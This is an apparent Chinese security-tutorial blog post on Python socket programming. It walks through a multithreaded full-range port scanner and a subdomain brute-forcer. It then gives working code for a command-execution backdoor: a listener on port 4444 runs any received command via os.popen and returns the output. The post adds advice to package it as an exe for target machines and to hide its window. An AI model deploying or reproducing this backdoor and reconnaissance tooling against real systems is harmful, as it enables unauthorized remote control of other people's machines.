首页 > 系统相关 >第158天:安全开发-Python-Socket编程&反弹Shell&分离免杀&端口探针&域名爆破

第158天:安全开发-Python-Socket编程&反弹Shell&分离免杀&端口探针&域名爆破

时间:2024-09-14 16:26:01浏览次数:16  
标签:__ Shell Socket Python ip print input port socket

前置知识

使用 socket 模块
1. 导入模块
首先,你需要导入 Python 的 socket 模块。
import socket
2. 创建套接字
使用 socket.socket() 函数创建一个新的套接字。这个函数可以接收两个参数:地址族和套接字类型。
    地址族(Address Family):AF_INET 用于 IPv4,AF_INET6 用于 IPv6。
    套接字类型(Socket Type):SOCK_STREAM 表示 TCP 套接字,SOCK_DGRAM 表示 UDP 套接字。
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3. 连接到服务器(客户端)
对于客户端,你需要使用 connect() 方法连接到服务器。
s.connect(('hostname', port))
4. 绑定地址(服务器)
对于服务器,你需要使用 bind() 方法将套接字绑定到一个地址(IP 地址和端口号)。
s.bind(('localhost', 12345))
5. 监听连接(服务器)
服务器需要监听进来的连接。使用 listen() 方法。
s.listen()
6. 接受连接(服务器)
服务器使用 accept() 方法接受连接。这个方法会阻塞,直到一个连接到达。
conn, addr = s.accept()
7. 发送和接收数据
    使用 send() 或 sendall() 方法发送数据。
    使用 recv() 方法接收数据。
# 发送数据  
s.sendall(b'Hello, world')  
# 接收数据  
data = s.recv(1024)
8. 关闭套接字
完成通信后,使用 close() 方法关闭套接字。
s.close()

socket链接图解

案例一:  Socket-通讯连接-端口扫描&域名爆破

端口扫描

socket进行端口扫描时,当正常有这个端口开放时,不会报错,当没有这个端口时会报错,每次连接完成后需要关闭,socket.socket()后面什么都不写的话,默认是进行tcp连接

根据这个点做一个简单的自己输入想输入的端口进行一个端口扫描(无论成功与否,都要把连接断开掉)

import socket

def port_scan(ip,port):
    s = socket.socket()
    try:
        s.connect((ip,int(port)))
        print(port+"--> open")
    except Exception as e:
        print(port+"--> down")
    finally:
        s.close()

if __name__ == '__main__':
    ip = input("please input ip:")
    ports = input("please input port(eg:80,133):")
    for port in ports.split(','):
        port_scan(ip,port) 

扫描本地ip

做一个远程扫描

 但是这个代码还有缺陷,因为只能一个一个进行扫描,当65535端口进行全扫描的时候,就会变得非常慢,因此需要引入多线程的概念

域名爆破

需要用到socket模块中的gethostbyname函数,成功的话会返回ip,失败会报错

根据这个基础写一个子域名爆破工具

import socket,time

def explode(url):
    #print(url)
    try:
        ip = socket.gethostbyname(url)
        print(url+"|"+ip)
        with open('domain-exception.txt','a+') as file:
            file.write(url+"|"+ip+"\n")
    except Exception as e:
        pass

if __name__ == '__main__':
    url = input("please input your url:")
    with open('dic.txt', 'r') as file:
        for line in file:
            #print(line.strip()+"."+url)
            explode(line.strip()+"."+url)
            #time.sleep(1)
            

爆破结果,能爆破出来多少结果取决于你的字典

 写入文件的的结果

案例二: Thread-多线程-自定义扫描&全端口扫描

上面的端口扫描案例虽然能扫描出来结果,但是速度太慢了。这里尝试加入多线程

当普通写两次循环的时候

执行结果

 简单的多线程

import socket,threading,time

def abc():
    for i in range(1,5):
        print(i)
        time.sleep(1)

if __name__ ==  '__main__':
    
    for i in range(1,5):
        s=threading.Thread(target=abc)
        s.start()

执行结果

但是这里要做端口扫描循环时候,肯定不能每次都从头开始,应该确保每次扫描都是不同端口。

调用quque库

import socket,threading,time,queue

def abc():
    try:
        print(q.get())
        time.sleep(3)
    finally:  
        q.task_done() 
if __name__ ==  '__main__':
    q=queue.Queue()
    for i in range(1,65536):
        q.put(i)
    threads = []
    for i in range(1,65535):
        s=threading.Thread(target=abc)
        s.start()
        threads.append(s)  
        
    # 等待所有线程完成  
    for t in threads:  
        t.join()

利用这种写法的话就不会出现每次都重新开始,这里我做了三秒延迟,但是他的速度依然很快

这里的话多线程有很多的知识,我们只做简单的使用

 简单的全扫描程序,有很多问题,这里线程我没有优化,直接设置了一起跑,会很消耗内存

import socket,threading,queue

def port_scan(ip):
    port = ports.get()
    s = socket.socket()
    try:
        s.connect((ip,int(port)))
        print(str(port)+"--> open")
    except Exception as e:
        pass
        #print(str(port)+"--> down")
    finally:
        s.close()

if __name__ == '__main__':
    ports = queue.Queue()
    for port in range(1,65536):
        ports.put(port)
    ip = input("please input ip:")
    for i in range(65536):
        s = threading.Thread(target=port_scan,args=(ip,))
        s.start()

跑出来的结果,而且好像不会中断,把关键信息跑出来以后就尽快中断

 下面是线程池玩法,这种写法确实好一点可以控制速度,而且不会卡顿,推荐!!!

import socket,threading
from concurrent.futures import ThreadPoolExecutor  
def port_scan(ip,port):
    s = socket.socket()
    try:
        s.connect((ip,int(port)))
        print(str(port)+"--> open")
    except Exception as e:
        pass
        #print(str(port)+"--> down")
    finally:
        s.close()
if __name__ == '__main__':
    ip = input("please input ip:")
    if __name__ == '__main__':  
        with ThreadPoolExecutor(max_workers=500) as executor:  # 创建一个最大包含500个线程的线程池  
            for port in range(65536):  # 提交65535个任务  
                executor.submit(port_scan,ip,port)  # 提交任务到线程池执行
        print("结束")

案例三: Socket-通讯后门-反弹后门&免杀应用

反弹后门

还是根据这张图,首先建立连接

服务端

客户端

netstat -an查看端口发现已经建立了连接

要进行传输数据的话,要生成新的socket连接

conn, addr = s.accept()

这里,conn是与客户端建立连接的新socket对象,而 addr是一个包含客户端地址信息的元组(例如,('192.168.1.100', 12345))。

客户端向服务端传数据

根据图解,服务端向客户端传数据可以直接传输,服务端不用生成新的socket会话

数据经过解码,可以重新变成字符串数据

close()关闭连接

如果传过去的是命令,可以利用os模块进行执行命令

os.popen(data).read()没有额外状态码

os.system()如果成功的话,会额外带一个状态码0,失败返回状态码1

 在此基础上写一个死循环,就能够实现不断命令执行

客户端

import socket,os

s = socket.socket()
ip = input("请输入ip:")
s.connect((ip,4444))
while True:
    data = input("please input cmdline:")
    s.send(data.encode("utf-8"))
    print(s.recv(1024).decode("utf-8"))
s.close()

服务端,代码还需要优化,比如输入错误的处理。

import socket,os

s = socket.socket()
s.bind(('0.0.0.0',4444))
s.listen(5)
conn,addr=s.accept()
while True:
    try:
        data = conn.recv(1024).decode("utf-8")
        result = os.popen(data).read()
        conn.send(result.encode("utf-8"))
    except Exception as e:
        conn.send("error".encode("utf-8"))
conn.close()

如果目标主机没有python环境,可以给打包成exe文件

pip install pyinstaller

pyinstaller -F py文件

执行结果

 这个黑窗口也可以取消,可以自己研究一下

标签:__,Shell,Socket,Python,ip,print,input,port,socket
From: https://blog.csdn.net/weixin_71529930/article/details/142245195

相关文章

  • Python存储与读写二进制文件
    本文介绍了一种在Python中将Numpy数组转存为一个紧凑的二进制格式的文件,及其使用内存映射的形式进行读取的方案。一个二进制的数据流,不仅可以更加方便页形式的内存映射,相比于传统的Numpy单精度浮点数数组还有一个可哈希的特性。总体来说是一个对于高性能计算十分友好的存......
  • 避免 PyCharm 将该 Python 脚本作为测试运行
    为了避免PyCharm将该Python脚本作为测试运行(即pytest自动捕获),你可以做以下几步来确保该脚本作为普通的Python程序执行,而不是作为pytest运行。解决方案:1.确保文件名不以test_开头:Pytest会自动检测以test_开头的文件,并尝试将其作为测试运行。如果你的文件名是test_m......
  • typer python cli 开发框架
    typer是一个基于pythontypehints的快速强大的cli开发框架,由fastapi框架的作者开发,是一个很不错的工具包含的特性使用简单简单支持开发复杂cli可以执行运行script参考使用安装python-mvenvvenvsourcevenv/bin/activatepipinstalltyper简单使用defmain(name:str):......
  • powershell@路径处理相关命令@路径拆分@路径解析@路径拼接@路径判断
    文章目录abstract一览表常用的路径处理场景重点路径处理命令1.Split-Path2.Convert-Path3.Join-Path4.Resolve-Path5.Test-Pathrvpavscvpa总结对比powershellprovider@powershell提供程序abstract在PowerShell中,处理路径相关的命令十分丰富,它们可以帮助我们管理、解析......
  • python数据分析与可视化
    Python是进行数据分析和可视化的强大工具。它提供了丰富的库和框架来帮助数据科学家和分析师处理数据集、执行统计分析以及创建交互式图表。以下是一些常用的库以及它们的基本用法。数据处理库Pandas:Pandas是Python中最流行的数据分析库之一,它提供了数据结构和数......
  • 代数模型(Algebraic Models)---线性规划------+ 案例 + Python源码求解(见文中)
    目录一、代数模型(AlgebraicModels)详解1.1什么是代数模型?1.2代数模型的基本形式1.3安装所需要的Python包--运行下述案例1.4代数模型的应用案例案例1:市场供需平衡模型Python求解代码Python求解结果如下图:案例2:运输问题中的线性规划模型进行数学建模分析1.目标函数2.......
  • PowerShell的安装与升级
    在旧版本的windows上执行powershell命令时,时不时出现一些奇怪的问题,常要花不少时间去摸索解决,现记录如下。WindowsServer2012R2安装PowerShell5https://download.microsoft.com/download/6/F/5/6F5FF66C-6775-42B0-86C4-47D41F2DA187/Win8.1AndW2K12R2-KB3191564-x64.msu完成后......
  • python https 下载文件
    同步下载defdownload_file_block(url:str,file_path:str):logging.basicConfig(level=logging.DEBUG)log=logging.getLogger('requests.packages.urllib3')log.setLevel(logging.DEBUG)log.propagate=TrueclassDebugAdapter(HTTPAd......
  • Python数据分析与可视化基础教程
    Python数据分析与可视化基础教程一、引言Python是一种功能强大的编程语言,广泛应用于数据科学、机器学习、Web开发等领域。在数据分析与可视化方面,Python提供了丰富的库和工具,可以帮助我们轻松地处理数据、提取有用信息,并将结果以直观的方式展示出来。本教程将介绍Python......
  • *Python*机器学习算法——线性回归(Linear Regression)
    目录⭐️引言⭐️理论1、 简单线性回归2、 多元线性回归3、最佳拟合⭐️结语⭐️引言        线性回归(LinearRegression)是一种基本的预测分析方法,它通过拟合数据点来建立因变量(目标变量)与一个或多个自变量之间的关系模型。线性回归假设这种关系是线性的,并试图找到......